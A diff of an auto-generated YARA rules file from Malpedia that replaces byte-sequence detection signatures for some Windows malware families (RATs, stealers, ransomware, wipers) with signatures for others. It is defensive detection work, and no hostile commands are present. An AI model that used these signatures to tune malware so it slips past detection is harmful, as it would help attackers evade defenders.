 		tool = "yara-signator v0.6.0"
@@ -114283,108 +114142,86 @@ rule MALPEDIA_Win_Bankshot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 81ec48040000 a1???????? 33c5 8945f8 53 }
-		$sequence_1 = { 8bf8 8d5101 8a01 41 84c0 75f9 57 }
-		$sequence_2 = { 68???????? ff7604 ff15???????? 81be2005000000008000 894608 751c 6a04 }
-		$sequence_3 = { 0f2815???????? 8bf2 2bf0 660f1f440000 0f10840de43fffff 0f28ca 660fefc8 }
-		$sequence_4 = { 0fb611 0fb6c0 eb17 81fa00010000 7313 8a87bce10110 }
-		$sequence_5 = { 83c8e0 40 0f280d???????? 8bf2 2bf0 660f1f440000 0f10840de4bfffff }
-		$sequence_6 = { 6a01 56 56 8975fc ff15???????? 85c0 7450 }
-		$sequence_7 = { c74048b8e40110 8b4508 6689486c 8b4508 66898872010000 8b4508 83a04c03000000 }
-		$sequence_8 = { 8b45fc 817848b8e40110 7409 ff7048 e8???????? 59 c70701000000 }
-		$sequence_9 = { 57 50 e8???????? 83c40c 6b45e430 8945e0 8d80d0e10110 }
-		$sequence_10 = { 81fa00010000 7313 8a87bce10110 08441619 42 0fb64101 }
-		$sequence_11 = { 894de4 3998c0e10110 0f84ea000000 41 83c030 894de4 3df0000000 }
-		$sequence_12 = { 33c0 6800000020 66898475ccfbffff 8d85ccfbffff }
-		$sequence_13 = { e8???????? 83c40c e8???????? 99 b907000000 f7f9 }
-		$sequence_14 = { 8a06 8d7601 884431ff 84c0 75f3 68???????? 8d730c }
-		$sequence_15 = { c700???????? 8b4508 898850030000 8b4508 59 c74048b8e40110 8b4508 }
-		$sequence_16 = { e8???????? 83c404 89861c020000 8b45e0 8d4e0c 6a06 8d90c4e10110 }
-		$sequence_17 = { c644243b7b c644243cc1 884c243d c644243ef5 }
-		$sequence_18 = { 6b05????????3c 0305???????? 0fb74df4 6bd13c 0fb74df6 }
-		$sequence_19 = { 8b442454 50 ff15???????? b801000000 }
-		$sequence_20 = { 488d91f00f0000 e8???????? 41bb12000000 488d158b760000 }
-		$sequence_21 = { 51 8d9508f8ffff 52 ff15???????? }
-		$sequence_22 = { 83c20f 8955dc 8b55ec 81c2e80e0000 52 }
-		$sequence_23 = { 41ffcb 4183cbf0 41ffc3 488d9530010000 b904010000 44891d???????? }
-		$sequence_24 = { 895c242c ff15???????? b910000000 33c0 }
-		$sequence_25 = { 2b8534feffff 3dd0070000 7307 33c0 e9???????? 8d8d5cfeffff 51 }
-		$sequence_26 = { 57 e8???????? 83c40c 85c0 7506 8d4707 50 }
-		$sequence_27 = { e8???????? 83c408 c78424a804000000000000 c78424a404000009303b00 8d8424a4040000 6808040000 eb80 }
-		$sequence_28 = { c785a4fbffff00000000 682c010000 ff15???????? c705????????00000000 68???????? ff15???????? }
-		$sequence_29 = { ff15???????? 4885c0 0f85a7010000 448d4870 448d402e 488d15ce520000 }
-		$sequence_30 = { 488d55c0 488bcb ff15???????? 4885c0 0f85df020000 488d55e0 488bcb }
-		$sequence_31 = { 59 eb33 8b7dd0 8b45e4 8b4de8 8b0485c8887100 }
-		$sequence_32 = { 57 c685b8feffff00 6803010000 6a00 8d85b9feffff 50 }
-		$sequence_33 = { e8???????? a1???????? 0f1005???????? 898584fbffff 66a1???????? }
-		$sequence_34 = { c64424210d e8???????? 8b4c2410 8b542414 8b442418 890d???????? }
-		$sequence_35 = { c6442421cd c64424229c c64424231d c644242436 }
-		$sequence_36 = { 57 8db8607d0110 57 ff15???????? ff0d???????? 83ef18 }
-		$sequence_37 = { c644241bc4 c644241c90 c644241d9c c644241e46 c644241f7b c64424209d }
-		$sequence_38 = { 4803d1 ffe2 4c8b05???????? 498d5106 488bcf }
-		$sequence_39 = { ff15???????? 488d15a6f20000 488d4c2420 488905???????? }
-		$sequence_40 = { 33c0 ffc2 83fa0a 7ce4 b80b000000 c3 }
-		$sequence_41 = { 83c410 8d4c2460 8d542408 51 683f000f00 6a00 }
-		$sequence_42 = { c3 4889b424b0450000 4889bc24b8450000 4c89ac24c0450000 }
-		$sequence_43 = { 83c40c 8d85bcfbffff 50 6804010000 ff15???????? 8d85bcfeffff 50 }
-		$sequence_44 = { 57 8b3d???????? 8bf1 68???????? 89b55cf2ffff 660fd645f0 8945f8 }
+		$sequence_0 = { 83fb12 741e 83fb03 7419 }
+		$sequence_1 = { 8b4004 c74410e8a0bb4200 8b42e8 8b4804 8d41e8 894411e4 }
+		$sequence_2 = { 750b 8b0d???????? e8???????? e8???????? 83ec18 }
+		$sequence_3 = { 8d8d48ffffff 68???????? e8???????? 85c0 8d8d30ffffff 8b8530ffffff }
+		$sequence_4 = { 33f6 3bc8 740c 8b0cb5f8344200 46 }
+		$sequence_5 = { e8???????? 83ec14 c645fc02 8bcc 8bd0 51 }
+		$sequence_6 = { c705????????01000000 c705????????01000000 6a04 58 6bc000 8b4d08 898894004300 }
+		$sequence_7 = { eb0f 8ad3 8d8d40ffffff e8???????? 8ad3 }
+		$sequence_8 = { 1bc0 83c801 85c0 745b e8???????? }
+		$sequence_9 = { 8d8d48ffffff c78548ffffffdc334200 e8???????? 83ec08 c745fc02000000 }
 
 	condition:
-		7 of them and filesize < 860160
+		7 of them and filesize < 647168
 }
-rule MALPEDIA_Win_Magic_Rat_Auto : FILE
+rule MALPEDIA_Win_Soul_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "982c6058-0233-5962-b1e1-ee61f14d1ffc"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.magic_rat_auto.yar#L1-L109"
+		id = "e9dd6236-3340-50b4-b5d0-39eff17887cc"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soul"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.soul_auto.yar#L1-L235"
 		license_url = "N/A"
-		logic_hash = "f70d7be02c5b390e3f3dfd5324abdc86d2919bb20841095d121cf5bf228f41f4"
-		score = 60
-		quality = 45
+		logic_hash = "006ca2db66b727a223c7e1c69f1643e1ec1c7be66a86b7b95f1d15a0130986f8"
+		score = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5e 5f 5d c3 660f28c8 f20f5c0d???????? }
-		$sequence_1 = { 89c3 e8???????? 660fefc0 f20f2ac3 }
-		$sequence_2 = { 660f28d8 f20f5c1d???????? f20f2cc3 660fefdb }
-		$sequence_3 = { 894664 8b4368 894668 8b436c }
-		$sequence_4 = { c1e008 29d0 c1f810 84c0 }
-		$sequence_5 = { 8b12 83fa01 740a 83fa02 7405 83fa03 }
-		$sequence_6 = { 0fb6442425 0fb6542427 c1e018 c1e210 09d0 }
-		$sequence_7 = { 8b02 83c001 83f801 0f8721010000 }
-		$sequence_8 = { be02000000 e8???????? 84c0 75d5 }
-		$sequence_9 = { 7410 66c1e802 0fb7c0 69d07b140000 }
+		$sequence_0 = { d3e2 8515???????? 7405 e8???????? }
+		$sequence_1 = { 40 803800 75f8 c745fc00000000 90 56 ff15???????? }
+		$sequence_2 = { 57 8bf8 be???????? 743a 8da42400000000 }
+		$sequence_3 = { ff25???????? 48895c2408 4889742410 57 4883ec30 }
+		$sequence_4 = { 7cde c745fc00000000 8da42400000000 8b4df8 51 57 }
+		$sequence_5 = { 741f 8da42400000000 8b03 57 50 }
+		$sequence_6 = { 85f6 0f84a4000000 803f00 8bc7 }
+		$sequence_7 = { 85f6 7506 837dfc04 7cda }
+		$sequence_8 = { 7409 90 fe08 40 803800 }
+		$sequence_9 = { 83c404 33f6 897304 8b4304 }
+		$sequence_10 = { eb22 e8???????? 488b4c2420 ffd0 90 48837c245008 }
+		$sequence_11 = { c744243a66003600 66448974243e 488d1d4ad10100 488bc3 488d7c2448 482bfb 0fb710 }
+		$sequence_12 = { ffc7 4883c202 413bf8 72db 8bce 85f6 743c }
+		$sequence_13 = { 7507 c743089a020000 85c0 0f84be010000 83f802 0f84b5010000 83f801 }
+		$sequence_14 = { 741a 488d05f9ef0000 483bf8 740e 833f00 }
+		$sequence_15 = { 4c8bf1 b801000000 85ff 7404 8932 eb06 8bf8 }
+		$sequence_16 = { c745c047006c00 c745c662006100 c745ca6c005c00 668945ec c745ce43006100 c745d468006500 }
+		$sequence_17 = { 442bda 4183fb0f 731e 0fb606 418bcb 4883c602 }
+		$sequence_18 = { e8???????? 41894620 458bef 418bff 41c74608373f0000 eb05 }
+		$sequence_19 = { 488b4593 89442448 8bc8 e8???????? 488bf0 33c0 8945c7 }
+		$sequence_20 = { 4883eb02 4983c9ff ebae 488d45ef 4c8b4507 4983f808 490f43c4 }
+		$sequence_21 = { eb2e 4c8b542418 33ed 0f1f840000000000 420fb60411 48ffc1 }
+		$sequence_22 = { 488d1dc7850000 488d3de0850000 eb0e 488b03 4885c0 7402 }
 
 	condition:
-		7 of them and filesize < 41843712
+		7 of them and filesize < 1400832
 }
-rule MALPEDIA_Win_Contopee_Auto : FILE
+rule MALPEDIA_Win_Cobint_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "271fdd0d-6160-55c0-9abb-0c6806deb383"
+		id = "eb358b61-4ba2-55a7-8a20-31d71cd4f25b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.contopee_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cobint_auto.yar#L1-L232"
 		license_url = "N/A"
-		logic_hash = "0ddd8fa512c666b7cb8e2d0e6704c228e8798333540020ddb32d384a50fcb44c"
+		logic_hash = "a45731be84e3fdba6ba2e9fa2e98a6d98c16a2eb8dae8c7026872152dd218ff0"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -114396,32 +114233,46 @@ rule MALPEDIA_Win_Contopee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b35???????? 8d4c2414 6a5c 51 }
-		$sequence_1 = { 8d4c2414 6a5c 51 ffd6 83c410 85c0 7411 }
-		$sequence_2 = { 84c0 752f a0???????? 84c0 7409 }
-		$sequence_3 = { c1ea18 33c3 8b1c9530ea0010 33c3 8b1c8d30f60010 33c3 }
-		$sequence_4 = { c3 68b80b0000 ff15???????? e8???????? 8bd8 85db 0f8514010000 }
-		$sequence_5 = { c1e807 33d2 8a9094130110 8bc2 66ff848688090000 8b869c160000 8b96a0160000 }
-		$sequence_6 = { 668b88780a0110 898a8c000000 33c9 668b887c0a0110 898a90000000 33c9 668b887e0a0110 }
-		$sequence_7 = { 5b 81c418010000 c3 56 68???????? 6a00 }
-		$sequence_8 = { 7563 8b4c2410 8d442400 56 50 8d1409 8b4c2414 }
-		$sequence_9 = { b980000000 33c0 8d7c241c 6a1e }
+		$sequence_0 = { 83c418 a1???????? 03c9 891cc8 8b0d???????? a1???????? }
+		$sequence_1 = { 891cc8 8b0d???????? a1???????? 03c9 8974c804 8b0d???????? }
+		$sequence_2 = { c745f404000000 50 8d4508 50 6805000020 56 }
+		$sequence_3 = { 50 8d45f4 50 8d45ec 50 6813000020 ff75f0 }
+		$sequence_4 = { 57 6a65 eb31 85db 743a }
+		$sequence_5 = { e8???????? 83c410 eb60 6a01 8d450f }
+		$sequence_6 = { 57 bf00020000 57 e8???????? 57 6a00 }
+		$sequence_7 = { 83f820 7cf3 eb07 8bf0 c1e604 03f2 57 }
+		$sequence_8 = { 740d 8b5508 0355f0 8a45ec }
+		$sequence_9 = { 31b7807c30ae 807c909090 90 bdfd807c90 }
+		$sequence_10 = { 8bcb 897db8 e8???????? 8bf0 }
+		$sequence_11 = { 81ffea968891 740a 33c0 8b12 85d2 }
+		$sequence_12 = { ffd6 eb03 8b75e4 ff75d8 ffd6 }
+		$sequence_13 = { 395318 763c 8b3c90 33c0 03fe }
+		$sequence_14 = { 90 90 90 e10b }
+		$sequence_15 = { b800a80000 2bc7 50 56 53 ff55f8 85c0 }
+		$sequence_16 = { 8802 eb0b 8b4d08 034df0 }
+		$sequence_17 = { bffc807c28 1a807c170e81 7cd7 9b 807c909090 90 90 }
+		$sequence_18 = { 749b 807ce19a80 7c90 90 }
+		$sequence_19 = { 90 e10b 96 7c90 90 }
+		$sequence_20 = { bab1c50790 8bf0 33ff e8???????? 8d4dec 8945f8 }
+		$sequence_21 = { ffd0 85c0 0f8406010000 8b4de0 ba6a62f095 }
+		$sequence_22 = { e8???????? 8945f8 8d45c4 50 }
+		$sequence_23 = { e8???????? 58 83c005 c3 31b7807c30ae }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Grey_Energy_Auto : FILE
+rule MALPEDIA_Win_Locky_Decryptor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "286c9a55-9cf0-55bb-80e0-2e0f311ee2a1"
+		id = "91dde92f-87a2-5234-b407-3d3ed8c90b2f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grey_energy_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.locky_decryptor_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "b914dfed1e2f2f24a40105da213346dd87b255cf1b7c608a5613862d55be27f8"
+		logic_hash = "adead49efcae5adc3a8d7fcf047561cadce25b6fc8d50f573c5cccce259fe79f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114435,38 +114286,32 @@ rule MALPEDIA_Win_Grey_Energy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 53 53 6800000008 57 }
-		$sequence_1 = { 6800000008 57 53 53 }
-		$sequence_2 = { 68???????? 8945cc e8???????? 68???????? 8945d4 }
-		$sequence_3 = { 8945d4 e8???????? 68???????? 8945d0 }
-		$sequence_4 = { 53 ff15???????? 8b75f8 85f6 }
-		$sequence_5 = { 8b45f8 0345ec 8808 eb10 }
-		$sequence_6 = { 8b45ec 8b55f8 66890c42 eb14 8b45ec 8b4df8 8b55f0 }
-		$sequence_7 = { 7507 33c0 e9???????? c745f004000000 }
-		$sequence_8 = { 8b4df8 8b55f0 8b7508 668b1456 66891441 }
-		$sequence_9 = { 8b4d08 0fb70c41 8b45f0 33d2 }
-		$sequence_10 = { 6a40 ff15???????? 8945f8 837df800 7507 33c0 }
-		$sequence_11 = { 8b4508 0345f0 0fbe08 8b45f0 }
-		$sequence_12 = { c60100 41 48 75f9 ff75f8 }
-		$sequence_13 = { ff5108 56 e9???????? 53 8d45cc 50 8d45c8 }
-		$sequence_14 = { 83ec18 57 33ff 897dfc 397d0c 0f86a5010000 }
-		$sequence_15 = { 51 e8???????? 85c0 0f84be000000 }
+		$sequence_0 = { 03049500c14100 eb05 b8???????? f6400420 }
+		$sequence_1 = { 7202 8b1b 837dec08 8b4dd8 7303 8d4dd8 03c0 }
+		$sequence_2 = { 395ddc 7413 837de008 8b45cc 7303 }
+		$sequence_3 = { 8bf7 83e61f c1e606 03348500c14100 }
+		$sequence_4 = { 8b4dfa 33c0 4a 49 668945e8 668945ea 6a27 }
+		$sequence_5 = { 50 33c9 8d7d08 8975f0 e8???????? 83cbff }
+		$sequence_6 = { 6830010000 e8???????? 33db 59 59 3bc3 7509 }
+		$sequence_7 = { e8???????? 8b5e04 8b0e 8bc3 2bc1 99 f7ff }
+		$sequence_8 = { 8b45ec 8b08 890b 8938 397df0 740a 57 }
+		$sequence_9 = { e8???????? 6a01 33ff 8d75d8 e8???????? 8b450c 8b4df4 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Snowflake_Stealer_Auto : FILE
+rule MALPEDIA_Win_Isaacwiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f7453706-1ba2-5bd7-a0a7-c5c6de296895"
+		id = "a82e3ec4-c6b5-5b3d-9ab0-3064ec3e836c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snowflake_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.isaacwiper_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "c1c0789100e95962556dcffebd1be08f13443b80c1f6c738a94979e3119de2a7"
+		logic_hash = "8d7d093defd2064582c177175fbd158891b23ac1a28e0ebb5ab5f45a7b73a475"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114480,32 +114325,32 @@ rule MALPEDIA_Win_Snowflake_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff750c 6a5c 53 e8???????? 8b6c2448 56 ff7504 }
-		$sequence_1 = { ff742428 e8???????? 83c414 eb88 3dab000000 7530 837c243400 }
-		$sequence_2 = { ff3408 ff742444 e8???????? 8b7c2440 83c414 89442410 85c0 }
-		$sequence_3 = { e8???????? 59 59 8b4c243c 85c9 7409 51 }
-		$sequence_4 = { ff7640 e8???????? 83c42c 85c0 7533 6a08 8d442418 }
-		$sequence_5 = { ff742444 ff742440 50 e8???????? 8bf0 83c414 85f6 }
-		$sequence_6 = { c744240c01000000 eb08 3c2b 0f8593000000 46 8a0e 0fb6c1 }
-		$sequence_7 = { e8???????? 59 59 85c0 7507 8b4510 2138 }
-		$sequence_8 = { c744240800000000 29f1 89c6 1b7c2414 f7de c1fe1f 01f1 }
-		$sequence_9 = { ff743234 ff7524 ff742428 53 e8???????? 8b542428 83c414 }
+		$sequence_0 = { 3bc8 737f 2bf9 8b4c2430 3bcf 0f8245020000 }
+		$sequence_1 = { 03c2 3bc3 8b5df4 72d5 eb37 83f802 }
+		$sequence_2 = { 83e03f c1f906 6bf038 03348de8670310 837e18ff 740c 837e18fe }
+		$sequence_3 = { 83c408 3bc3 8d48ff 0f46c1 014658 837e5815 7368 }
+		$sequence_4 = { 8b03 51 c744243007000000 8bcb 7445 ff501c 8d442430 }
+		$sequence_5 = { 50 c7460800000000 c7461000000000 c7461400000000 e8???????? 83c404 }
+		$sequence_6 = { 3914c598c00210 7408 40 83f81d }
+		$sequence_7 = { e8???????? 8ac8 83c404 46 83c768 84c9 75e4 }
+		$sequence_8 = { 8b4d0c 83d900 8945e0 894ddc c745f800000000 897dd8 895df4 }
+		$sequence_9 = { 69c9dfb00899 33ca 338c8634060000 890c86 40 3de3000000 72cf }
 
 	condition:
-		7 of them and filesize < 6196224
+		7 of them and filesize < 467968
 }
-rule MALPEDIA_Win_Gibberish_Auto : FILE
+rule MALPEDIA_Win_Dinodas_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d0f0a81c-c436-554f-886e-c05189a90753"
+		id = "431aac36-5429-5cb6-a22f-6d22f4b46964"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gibberish_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dinodas_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dinodas_rat_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "ec3ea314ac6eedd0a24b154c568d1f6c449d7a6dabe6072547ddc0bc708507da"
+		logic_hash = "f12d1a523704ecc621dca1f8d26285a0bb3fbc82969aec41d1e0b2ffd38a67b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114519,32 +114364,32 @@ rule MALPEDIA_Win_Gibberish_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894dec 8975e8 668907 894dfc 8bce c745f001000000 8d5102 }
-		$sequence_1 = { 8b74242c 8bd0 8944245c 8bce 8bc6 c1c90b c1c007 }
-		$sequence_2 = { 68???????? ff15???????? 85c0 7424 56 56 8d85fcfffdff }
-		$sequence_3 = { 8b0ccdf2a94700 0fb680c8a94500 330cc5f1a94700 8bc2 c1e818 0fb680c8a94500 330cc5f4a94700 }
-		$sequence_4 = { 330a 85d2 894b04 8d4a04 0f44ca }
-		$sequence_5 = { ffd3 8b45d8 8d3446 33c0 83c602 663906 75c3 }
-		$sequence_6 = { f30f7e05???????? 0f114c2420 0f284c2450 660f3840c8 0f10442420 0f11542470 }
-		$sequence_7 = { 7535 017524 297528 2bd6 8b5c242c 5f }
-		$sequence_8 = { 6af5 eb03 50 6af6 ff15???????? 8b04bd80b64700 }
-		$sequence_9 = { 33c8 8b44241c 33c6 23442414 33c6 03c8 8b442474 }
+		$sequence_0 = { 8bf0 33c9 83c404 8975ec 3bf1 745c 8b4704 }
+		$sequence_1 = { ffd2 8b9d94fdffff 8d8da0fdffff 51 53 ff15???????? }
+		$sequence_2 = { c745a80f000000 e8???????? c645fc01 a1???????? 6aff 50 ff15???????? }
+		$sequence_3 = { 8d45b4 e9???????? 8d45a8 e9???????? 8d75d4 e9???????? 8d75b8 }
+		$sequence_4 = { 6a00 6a01 ff15???????? 8bf8 85ff 741a 6a00 }
+		$sequence_5 = { 8d4d9c 68???????? 51 e8???????? 83c40c 397594 720c }
+		$sequence_6 = { 8bce 8bf3 83f804 7217 8d4900 8b16 3b11 }
+		$sequence_7 = { 8b4204 ffd0 8b4d0c 51 e8???????? 83c404 8937 }
+		$sequence_8 = { 83e810 e8???????? 8d7010 8975c4 c645fc07 8b4714 }
+		$sequence_9 = { 8d75b8 e9???????? 8d759c e9???????? 8db578ffffff e9???????? 8db548ffffff }
 
 	condition:
-		7 of them and filesize < 1068032
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Sage_Ransom_Auto : FILE
+rule MALPEDIA_Win_Rtm_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ee390467-2b1f-5dff-a025-ffcdbd989eda"
+		id = "c193efe6-e068-5098-a7d3-9f677c141047"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sage_ransom_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rtm_locker_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "f697fb2bbef92176cedab9ef91a434357e32fdc073b94b3d51cf50581ce561f1"
+		logic_hash = "2e6ca0dcb3b2e786645310d69deee5d15ea048d4739b56fdd6e98df960bfefa8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114558,38 +114403,32 @@ rule MALPEDIA_Win_Sage_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 01442410 ff15???????? 8bc8 8b442410 2b4c2438 }
-		$sequence_1 = { 755b 6683780200 7554 6aff ff15???????? 85c0 }
-		$sequence_2 = { c1e910 0fb74c4c18 c1e010 0bc8 8bd1 }
-		$sequence_3 = { 837c241000 750b 837c241400 0f84d8000000 8b442410 be00000200 3bc6 }
-		$sequence_4 = { bbfdffffff 8d4c240c 51 e8???????? 8d54241c 52 }
-		$sequence_5 = { 56 57 6af5 ff15???????? 8b15???????? 83c204 52 }
-		$sequence_6 = { 6a41 56 52 e8???????? 56 }
-		$sequence_7 = { 8bf1 33d2 3bf7 732a 8a06 }
-		$sequence_8 = { 014110 8b4314 014114 8b4318 }
-		$sequence_9 = { 014108 8b430c 01410c 8b4310 }
-		$sequence_10 = { 01410c 8b4310 014110 8b4314 }
-		$sequence_11 = { 891c24 89442404 e8???????? 8d964ba20000 c744240879020000 }
-		$sequence_12 = { 014114 8b4318 014118 8b431c }
-		$sequence_13 = { 013c13 83c102 46 ebd3 }
-		$sequence_14 = { 0101 8b4304 014104 8b4308 014108 }
-		$sequence_15 = { 0119 117104 83c110 83c210 }
+		$sequence_0 = { 50 ffd7 8b44241c 8d542410 52 8d542424 c744241400000000 }
+		$sequence_1 = { 8bbd38ffffff 33d0 c1c210 03ca 33f1 c1c60c }
+		$sequence_2 = { 0f29a424b0000000 660fd4c1 0f28e2 0f29b42410010000 660f62e0 660f6ad0 }
+		$sequence_3 = { 8d85e8feffff 50 6a00 ff15???????? 85c0 7440 68???????? }
+		$sequence_4 = { 8d8550fcffff 50 8d95c8feffff 8d8d68ffffff e8???????? 83c404 8d8d68ffffff }
+		$sequence_5 = { 0f1195ecfdffff 0f119dfcfdffff 0f11a50cfeffff 0f11851cfeffff 660f1f440000 8b840d2cfeffff 01840d64fcffff }
+		$sequence_6 = { 57 660f1f440000 3a1a 7403 42 }
+		$sequence_7 = { 0f108560feffff 0f118570fdffff 0f108570feffff 0f118580fdffff e8???????? 8d8d30feffff e8???????? }
+		$sequence_8 = { 894590 33fe c1c708 8d040f 8945ec 33c2 }
+		$sequence_9 = { 8b4dec 48 897dfc 897db8 894508 85c0 0f8f3ffeffff }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Sphijacker_Auto : FILE
+rule MALPEDIA_Win_Cameleon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "077eac03-f3ac-5e2b-a96b-7f5530f41d45"
+		id = "6ba1f947-7c11-5a6f-94b1-6f9ed842ec2b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sphijacker_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cameleon_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "99b2b9f410e1eea51f0fdbb2a2e5758813b393a388e6990a38118e63ac79cf3a"
+		logic_hash = "5126d39a589ca456705b9580398901c26a625f6b65ede04aeb5951f2fdaf02c8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -114603,32 +114442,32 @@ rule MALPEDIA_Win_Sphijacker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33db 488d154de60100 4533c0 488d0c9b 488d0cca baa00f0000 e8???????? }
-		$sequence_1 = { 4885c9 741c 488d05208b0000 483bc8 7410 b801000000 f00fc1815c010000 }
-		$sequence_2 = { 488d159ee00100 ff15???????? 488b4d20 488d4510 c744242804000000 }
-		$sequence_3 = { 488d8d16120000 0f1005???????? 898510120000 33d2 0fb705???????? 41b8f2010000 }
-		$sequence_4 = { 6666660f1f840000000000 803099 488d4004 4883e901 75f3 }
-		$sequence_5 = { 488d4510 c744242804000000 488d158fdb0100 41b904000000 4889442420 }
-		$sequence_6 = { 4533db 488d3d6b340000 4d85c9 488bc2 4c8be2 }
-		$sequence_7 = { 488b4d18 4c8d4520 488d158ee30100 ff15???????? 488b4d20 }
-		$sequence_8 = { 8b442430 8bc8 cd29 488d0d765e0100 e8???????? 488b442428 }
